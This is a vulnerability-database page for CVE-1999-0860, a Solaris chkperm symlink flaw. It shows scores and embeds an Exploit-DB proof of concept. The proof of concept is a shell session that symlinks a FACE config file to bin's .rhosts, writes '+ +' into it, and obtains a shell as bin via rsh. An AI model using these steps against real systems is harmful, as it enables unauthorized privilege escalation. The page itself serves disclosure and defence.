CVE-1999-0860 : Detail

0.04%V3
Local
2000-02-04 04h00 +00:00
2024-08-01 16h55 +00:00
CVE Descriptions

Solaris chkperm allows local users to read files owned by bin via the VMSYS environmental variable and a symlink attack.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 2.1 | | AV:L/AC:L/Au:N/C:P/I:N/A:N | [email protected] |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 19235

Publication date : 1996-12-04 23h00 +00:00
Author : Kevin L Prigge
EDB Verified : Yes

source: https://www.securityfocus.com/bid/295/info

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called FACE (Framed Access Command Environment) installed. Included in the package is a program called chkperm which checks a file to see if the user has permission to use the FACE interface. This program is installed suid and sgid bin, and is trivially exploitable to compromise the bin account under Solaris 2.4.

Running chkperm in a directory that has world write privilege or in a directory that belongs to bin. chkperm on Solaris 2.5 seems to create a file called <gibberish characters> in the directory from where you execute it. chkperm needs write access for user bin (or group bin) to the directory from which you execute it.

It also works the same with just 'chkperm -l', you can set the environment variable VMSYS to anything. You could then create the link (to .rhosts in the example) using the <gibberish characters> file name created by chkperm and accomplish the same result.

    % mkdir /tmp/foo
    % mkdir /tmp/foo/lib
    % chmod -R 777 /tmp/foo
    % setenv VMSYS /tmp/foo
    % umask 0000
    % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
    % /usr/vmsys/bin/chkperm -l -u foo
    % ls -l /usr/bin/.rhosts
    -rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
    % echo "+ +" >> /usr/bin/.rhosts
    % ls -l /usr/bin/.rhosts
    -rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
    % rsh -l bin localhost /bin/csh -i
    Warning: no access to tty; thus no job control in this shell...
    % id
    uid=2(bin) gid=2(bin)

Products Mentioned

Configuration 0

Sun>>Solaris >> Version 2.5.1

Sun>>Solaris >> Version 2.6

Sun>>Solaris >> Version 7.0

Sun>>Sunos >> Version -

Sun>>Sunos >> Version 5.5.1

Sun>>Sunos >> Version 5.7

References

http://www.securityfocus.com/bid/837
Tags : vdb-entry, x_refsource_BID